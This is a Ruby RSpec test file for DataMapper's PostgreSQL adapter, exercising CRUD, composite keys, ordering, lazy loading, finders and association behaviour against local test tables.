| 26.965909 | 84 | 0.597134 |
b98c7dcae4895f64d8e4feceabf63ee4b4514a5a | 21,375 | require 'pathname'
require Pathname(__FILE__).dirname.expand_path.parent + 'spec_helper'
require ROOT_DIR + 'lib/data_mapper'
begin
require 'do_postgres'
DataMapper.setup(:postgres, ENV["POSTGRES_SPEC_URI"] || "postgres://postgres@localhost/dm_core_test")
describe DataMapper::Adapters::DataObjectsAdapter do
before do
@adapter = repository(:postgres).adapter
end
describe "reading & writing a database" do
before do
@adapter.execute('DROP TABLE IF EXISTS "users"')
@adapter.execute('DROP SEQUENCE IF EXISTS "users_id_seq"')
end
before do
@adapter.execute('CREATE SEQUENCE "users_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "users" (
"id" INT4 DEFAULT nextval('users_id_seq') NOT NULL,
"name" TEXT
)
EOS
@adapter.execute("INSERT INTO users (name) VALUES ('Paul')")
end
it 'should be able to #execute an arbitrary query' do
result = @adapter.execute("INSERT INTO users (name) VALUES ('Sam')")
result.affected_rows.should == 1
end
it 'should be able to #query' do
result = @adapter.query("SELECT * FROM users")
result.should be_kind_of(Array)
row = result.first
row.should be_kind_of(Struct)
row.members.should == %w{id name}
row.id.should == 1
row.name.should == 'Paul'
end
it 'should return an empty array if #query found no rows' do
@adapter.execute("DELETE FROM users")
result = nil
lambda { result = @adapter.query("SELECT * FROM users") }.should_not raise_error
result.should be_kind_of(Array)
result.size.should == 0
end
end
describe "CRUD for serial Key" do
before do
@adapter.execute('DROP TABLE IF EXISTS "video_games"')
@adapter.execute('DROP SEQUENCE IF EXISTS "video_games_id_seq"')
end
before do
class VideoGame
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
end
@adapter.execute('CREATE SEQUENCE "video_games_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "video_games" (
"id" INT4 DEFAULT nextval('video_games_id_seq') NOT NULL,
"name" VARCHAR(50)
)
EOS
end
it 'should be able to create a record' do
game = VideoGame.new(:name => 'System Shock')
repository(:postgres).save(game)
game.should_not be_a_new_record
game.should_not be_dirty
@adapter.query('SELECT "id" FROM "video_games" WHERE "name" = ?', game.name).first.should == game.id
@adapter.execute('DELETE FROM "video_games" WHERE "id" = ? RETURNING id', game.id).to_i.should == 1
end
it 'should be able to read a record' do
name = 'Wing Commander: Privateer'
id = @adapter.execute('INSERT INTO "video_games" ("name") VALUES (?) RETURNING id', name).insert_id
game = repository(:postgres).get(VideoGame, [id])
game.name.should == name
game.should_not be_dirty
game.should_not be_a_new_record
@adapter.execute('DELETE FROM "video_games" WHERE "name" = ?', name)
end
it 'should be able to update a record' do
name = 'Resistance: Fall of Mon'
id = @adapter.execute('INSERT INTO "video_games" ("name") VALUES (?) RETURNING id', name).insert_id
game = repository(:postgres).get(VideoGame, [id])
game.name = game.name.sub(/Mon/, 'Man')
game.should_not be_a_new_record
game.should be_dirty
repository(:postgres).save(game)
game.should_not be_dirty
clone = repository(:postgres).get(VideoGame, [id])
clone.name.should == game.name
@adapter.execute('DELETE FROM "video_games" WHERE "id" = ?', id)
end
it 'should be able to delete a record' do
name = 'Zelda'
id = @adapter.execute('INSERT INTO "video_games" ("name") VALUES (?) RETURNING id', name).insert_id
game = repository(:postgres).get(VideoGame, [id])
game.name.should == name
repository(:postgres).destroy(game).should be_true
game.should be_a_new_record
game.should be_dirty
end
it 'should respond to Resource#get' do
name = 'Contra'
id = @adapter.execute('INSERT INTO "video_games" ("name") VALUES (?) RETURNING id', name).insert_id
contra = repository(:postgres) { VideoGame.get(id) }
contra.should_not be_nil
contra.should_not be_dirty
contra.should_not be_a_new_record
contra.id.should == id
end
end
describe "CRUD for Composite Key" do
before do
@adapter.execute('DROP TABLE IF EXISTS "bank_customers"')
end
before do
class BankCustomer
include DataMapper::Resource
property :bank, String, :key => true
property :account_number, String, :key => true
property :name, String
end
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "bank_customers" (
"bank" VARCHAR(50),
"account_number" VARCHAR(50),
"name" VARCHAR(50)
)
EOS
end
it 'should be able to create a record' do
customer = BankCustomer.new(:bank => 'Community Bank', :acount_number => '123456', :name => 'David Hasselhoff')
repository(:postgres).save(customer)
customer.should_not be_a_new_record
customer.should_not be_dirty
row = @adapter.query('SELECT "bank", "account_number" FROM "bank_customers" WHERE "name" = ?', customer.name).first
row.bank.should == customer.bank
row.account_number.should == customer.account_number
end
it 'should be able to read a record' do
bank, account_number, name = 'Chase', '4321', 'Super Wonderful'
@adapter.execute('INSERT INTO "bank_customers" ("bank", "account_number", "name") VALUES (?, ?, ?)', bank, account_number, name)
repository(:postgres).get(BankCustomer, [bank, account_number]).name.should == name
@adapter.execute('DELETE FROM "bank_customers" WHERE "bank" = ? AND "account_number" = ?', bank, account_number)
end
it 'should be able to update a record' do
bank, account_number, name = 'Wells Fargo', '00101001', 'Spider Pig'
@adapter.execute('INSERT INTO "bank_customers" ("bank", "account_number", "name") VALUES (?, ?, ?)', bank, account_number, name)
customer = repository(:postgres).get(BankCustomer, [bank, account_number])
customer.name = 'Bat-Pig'
customer.should_not be_a_new_record
customer.should be_dirty
repository(:postgres).save(customer)
customer.should_not be_dirty
clone = repository(:postgres).get(BankCustomer, [bank, account_number])
clone.name.should == customer.name
@adapter.execute('DELETE FROM "bank_customers" WHERE "bank" = ? AND "account_number" = ?', bank, account_number)
end
it 'should be able to delete a record' do
bank, account_number, name = 'Megacorp', 'ABC', 'Flash Gordon'
@adapter.execute('INSERT INTO "bank_customers" ("bank", "account_number", "name") VALUES (?, ?, ?)', bank, account_number, name)
customer = repository(:postgres).get(BankCustomer, [bank, account_number])
customer.name.should == name
repository(:postgres).destroy(customer).should be_true
customer.should be_a_new_record
customer.should be_dirty
end
it 'should respond to Resource#get' do
bank, account_number, name = 'Conchords', '1100101', 'Robo Boogie'
@adapter.execute('INSERT INTO "bank_customers" ("bank", "account_number", "name") VALUES (?, ?, ?)', bank, account_number, name)
robots = repository(:postgres) { BankCustomer.get(bank, account_number) }
robots.should_not be_nil
robots.should_not be_dirty
robots.should_not be_a_new_record
robots.bank.should == bank
robots.account_number.should == account_number
end
end
describe "Ordering a Query" do
before do
@adapter.execute('DROP TABLE IF EXISTS "sail_boats"')
@adapter.execute('DROP SEQUENCE IF EXISTS "sail_boats_id_seq"')
end
before do
class SailBoat
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
property :port, String
class << self
def property_by_name(name)
properties(repository.name)[name]
end
end
end
@adapter.execute('CREATE SEQUENCE "sail_boats_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "sail_boats" (
"id" INT4 DEFAULT nextval('sail_boats_id_seq') NOT NULL,
"name" VARCHAR(50),
"port" VARCHAR(50)
)
EOS
repository(:postgres).save(SailBoat.new(:id => 1, :name => "A", :port => "C"))
repository(:postgres).save(SailBoat.new(:id => 2, :name => "B", :port => "B"))
repository(:postgres).save(SailBoat.new(:id => 3, :name => "C", :port => "A"))
end
it "should order results" do
result = repository(:postgres).all(SailBoat,{:order => [
DataMapper::Query::Direction.new(SailBoat.property_by_name(:name), :asc)
]})
result[0].id.should == 1
result = repository(:postgres).all(SailBoat,{:order => [
DataMapper::Query::Direction.new(SailBoat.property_by_name(:port), :asc)
]})
result[0].id.should == 3
result = repository(:postgres).all(SailBoat,{:order => [
DataMapper::Query::Direction.new(SailBoat.property_by_name(:name), :asc),
DataMapper::Query::Direction.new(SailBoat.property_by_name(:port), :asc)
]})
result[0].id.should == 1
result = repository(:postgres).all(SailBoat,{:order => [
SailBoat.property_by_name(:name),
DataMapper::Query::Direction.new(SailBoat.property_by_name(:port), :asc)
]})
result[0].id.should == 1
end
end
describe "Lazy Loaded Properties" do
before do
@adapter.execute('DROP TABLE IF EXISTS "sail_boats"')
@adapter.execute('DROP SEQUENCE IF EXISTS "sail_boats_id_seq"')
end
before do
class SailBoat
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :notes, String, :lazy => [:notes]
property :trip_report, String, :lazy => [:notes,:trip]
property :miles, Fixnum, :lazy => [:trip]
class << self
def property_by_name(name)
properties(repository.name)[name]
end
end
end
@adapter.execute('CREATE SEQUENCE "sail_boats_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "sail_boats" (
"id" INT4 DEFAULT nextval('sail_boats_id_seq') NOT NULL,
"notes" VARCHAR(50),
"trip_report" VARCHAR(50),
"miles" INTEGER
)
EOS
repository(:postgres).save(SailBoat.new(:id => 1, :notes=>'Note',:trip_report=>'Report',:miles=>23))
repository(:postgres).save(SailBoat.new(:id => 2, :notes=>'Note',:trip_report=>'Report',:miles=>23))
repository(:postgres).save(SailBoat.new(:id => 3, :notes=>'Note',:trip_report=>'Report',:miles=>23))
end
it "should lazy load" do
result = repository(:postgres).all(SailBoat,{})
result[0].instance_variables.should_not include('@notes')
result[0].instance_variables.should_not include('@trip_report')
result[1].instance_variables.should_not include('@notes')
result[0].notes.should_not be_nil
result[1].instance_variables.should include('@notes')
result[1].instance_variables.should include('@trip_report')
result[1].instance_variables.should_not include('@miles')
result = repository(:postgres).all(SailBoat,{})
result[0].instance_variables.should_not include('@trip_report')
result[0].instance_variables.should_not include('@miles')
result[1].trip_report.should_not be_nil
result[2].instance_variables.should include('@miles')
end
end
describe "finders" do
before do
@adapter.execute('DROP TABLE IF EXISTS "serial_finder_specs"')
@adapter.execute('DROP SEQUENCE IF EXISTS "serial_finder_specs_id_seq"')
end
before do
class SerialFinderSpec
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :sample, String
end
@adapter.execute('CREATE SEQUENCE "serial_finder_specs_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "serial_finder_specs" (
"id" INT4 DEFAULT nextval('serial_finder_specs_id_seq') NOT NULL,
"sample" VARCHAR(50)
)
EOS
# Why do we keep testing with Repository instead of the models directly?
# Just because we're trying to target the code we're actualling testing
# as much as possible.
setup_repository = repository(:postgres)
100.times do
setup_repository.save(SerialFinderSpec.new(:sample => rand.to_s))
end
end
it "should return all available rows" do
repository(:postgres).all(SerialFinderSpec, {}).should have(100).entries
end
it "should allow limit and offset" do
repository(:postgres).all(SerialFinderSpec, { :limit => 50 }).should have(50).entries
repository(:postgres).all(SerialFinderSpec, { :limit => 20, :offset => 40 }).map(&:id).should ==
repository(:postgres).all(SerialFinderSpec, {})[40...60].map(&:id)
end
it "should lazy-load missing attributes" do
sfs = repository(:postgres).all(SerialFinderSpec, { :fields => [:id], :limit => 1 }).first
sfs.should be_a_kind_of(SerialFinderSpec)
sfs.should_not be_a_new_record
sfs.instance_variables.should_not include('@sample')
sfs.sample.should_not be_nil
end
it "should translate an Array to an IN clause" do
ids = repository(:postgres).all(SerialFinderSpec, { :limit => 10 }).map(&:id)
results = repository(:postgres).all(SerialFinderSpec, { :id => ids })
results.size.should == 10
results.map(&:id).should == ids
end
end
describe "many_to_one associations" do
before do
@adapter.execute('DROP TABLE IF EXISTS "engines"')
@adapter.execute('DROP SEQUENCE IF EXISTS "engines_id_seq"')
@adapter.execute('DROP TABLE IF EXISTS "yards"')
@adapter.execute('DROP SEQUENCE IF EXISTS "yards_id_seq"')
end
before do
class Engine
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
end
@adapter.execute('CREATE SEQUENCE "engines_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "engines" (
"id" INT4 DEFAULT nextval('engines_id_seq') NOT NULL,
"name" VARCHAR(50)
)
EOS
@adapter.execute('INSERT INTO "engines" ("id", "name") values (?, ?)', 1, 'engine1')
@adapter.execute('INSERT INTO "engines" ("id", "name") values (?, ?)', 2, 'engine2')
class Yard
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
repository(:postgres) do
many_to_one :engine
end
end
@adapter.execute('CREATE SEQUENCE "yards_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "yards" (
"id" INT4 DEFAULT nextval('yards_id_seq') NOT NULL,
"name" VARCHAR(50),
"engine_id" INTEGER
)
EOS
@adapter.execute('INSERT INTO "yards" ("id", "name", "engine_id") values (?, ?, ?)', 1, 'yard1', 1)
end
it "should load without the parent"
it 'should allow substituting the parent' do
y = repository(:postgres).all(Yard, :id => 1).first
e = repository(:postgres).all(Engine, :id => 2).first
y.engine = e
repository(:postgres).save(y)
y = repository(:postgres).all(Yard, :id => 1).first
y[:engine_id].should == 2
end
it "#many_to_one" do
yard = Yard.new
yard.should respond_to(:engine)
yard.should respond_to(:engine=)
end
it "should load the associated instance" do
y = repository(:postgres).all(Yard, :id => 1).first
y.engine.should_not be_nil
y.engine.id.should == 1
y.engine.name.should == "engine1"
end
it 'should save the association key in the child' do
e = repository(:postgres).all(Engine, :id => 2).first
repository(:postgres).save(Yard.new(:id => 2, :name => 'yard2', :engine => e))
repository(:postgres).all(Yard, :id => 2).first[:engine_id].should == 2
end
it 'should save the parent upon saving of child' do
e = Engine.new(:id => 10, :name => "engine10")
y = Yard.new(:id => 10, :name => "Yard10", :engine => e)
repository(:postgres).save(y)
y[:engine_id].should == 10
repository(:postgres).all(Engine, :id => 10).first.should_not be_nil
end
end
describe "one_to_many associations" do
before do
@adapter.execute('DROP TABLE IF EXISTS "hosts"')
@adapter.execute('DROP SEQUENCE IF EXISTS "hosts_id_seq"')
@adapter.execute('DROP TABLE IF EXISTS "slices"')
@adapter.execute('DROP SEQUENCE IF EXISTS "slices_id_seq"')
end
before do
class Host
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
repository(:postgres) do |context|
one_to_many :slices, :test => context
end
end
@adapter.execute('CREATE SEQUENCE "hosts_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "hosts" (
"id" INT4 DEFAULT nextval('hosts_id_seq') NOT NULL,
"name" VARCHAR(50)
)
EOS
@adapter.execute('INSERT INTO "hosts" ("id", "name") values (?, ?)', 1, 'host1')
@adapter.execute('INSERT INTO "hosts" ("id", "name") values (?, ?)', 2, 'host2')
class Slice
include DataMapper::Resource
property :id, Fixnum, :serial => true
property :name, String
repository(:postgres) do
many_to_one :host
end
end
@adapter.execute('CREATE SEQUENCE "slices_id_seq"')
@adapter.execute(<<-EOS.compress_lines)
CREATE TABLE "slices" (
"id" INT4 DEFAULT nextval('slices_id_seq') NOT NULL,
"name" VARCHAR(50),
"host_id" INTEGER
)
EOS
@adapter.execute('INSERT INTO "slices" ("id", "name", "host_id") values (?, ?, ?)', 1, 'slice1', 1)
@adapter.execute('INSERT INTO "slices" ("id", "name", "host_id") values (?, ?, ?)', 2, 'slice2', 1)
end
it "#one_to_many" do
h = Host.new
h.should respond_to(:slices)
end
it "should allow removal of a child through a loaded association" do
h = repository(:postgres).all(Host, :id => 1).first
s = h.slices.first
h.slices.delete(s)
h.slices.size.should == 1
s = repository(:postgres).first(Slice, :id => s.id)
s.host.should be_nil
s[:host_id].should be_nil
end
it "should load the associated instances" do
h = repository(:postgres).all(Host, :id => 1).first
h.slices.should_not be_nil
h.slices.size.should == 2
h.slices.first.id.should == 1
h.slices.last.id.should == 2
end
it "should add and save the associated instance" do
h = repository(:postgres).all(Host, :id => 1).first
h.slices << Slice.new(:id => 3, :name => 'slice3')
s = repository(:postgres).all(Slice, :id => 3).first
s.host.id.should == 1
end
it "should not save the associated instance if the parent is not saved" do
h = Host.new(:id => 10, :name => "host10")
h.slices << Slice.new(:id => 10, :name => 'slice10')
repository(:postgres).all(Slice, :id => 10).first.should be_nil
end
it "should save the associated instance upon saving of parent" do
h = Host.new(:id => 10, :name => "host10")
h.slices << Slice.new(:id => 10, :name => 'slice10')
repository(:postgres).save(h)
s = repository(:postgres).all(Slice, :id => 10).first
s.should_not be_nil
s.host.should_not be_nil
s.host.id.should == 10
end
end
end
rescue LoadError => e
describe 'do_postgres' do
it 'should be required' do
fail "PostgreSQL integration specs not run! Could not load do_postgres: #{e}"
end
end
end
| 33.928571 | 136 | 0.600889 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.